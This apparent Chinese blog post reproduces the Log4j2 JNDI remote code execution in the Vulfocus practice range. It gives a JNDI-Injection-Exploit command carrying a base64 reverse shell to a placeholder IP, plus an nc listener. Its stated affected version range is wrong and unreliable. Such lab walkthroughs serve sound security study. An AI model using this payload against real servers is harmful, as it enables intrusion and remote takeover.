Apache Log4j2远程代码执行漏洞复现

建议直接通过靶场开源项目——Vulfocus进行测试(自行注册)
然后需要一个VSP服务器,我使用的是阿里云。
下载JDK,注意需要jdk1.8.0或者1.7其他版本可能有问题
curl http://www.joaomatosf.com/rnp/java_files/jdk-8u20-linux-x64.tar.gz -o jdk-8u20-linux-x64.tar.gz
tar zxvf jdk-8u20-linux-x64.tar.gz
rm -rf /usr/bin/java*
ln -s /opt/jdk1.8.0_20/bin/j* /usr/bin

下载一个jar包用来搭建ldap服务器和http服务器
链接:https://pan.baidu.com/s/11NkWPbvyO0dTEK-D6MmKLQ
提取码:1234

下载之后运行这个jar包,执行以下命令开启
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjIuMy40Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}” -A “1.2.3.4”
说明:上面的base64就是一个反弹shell的代码,换成自己的ip和监听端口,重新生成base64放进即可,还有后面-A的也换成自己的监听ip
在这里插入图片描述

执行命令之后,启动了服务,终端会显示5个payload,按自己的java版本选择对应的payload去执行即可,这里我选的第5个payload:rmi://xx.xx.xx.xx:1099/vgylii
然后我们在开启一个终端,监听刚刚设置的端口9999
nc -lvnp 999
在这里插入图片描述

  1. Apache Log4j2版本大于2小于2.82
  2. 有反序列化的利用链,因为这个漏洞只是提供给你一个让你传递反序列化数据的入口而已,至于能不能rce则是取决于被攻击机器上有没有完整的利用链。

RMI协议 rmi:// com.sun.jndi.url.rmi.rmiURLContext
LDAP协议 ldap:// com.sun.jndi.url.ldap.ldapURLContext

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值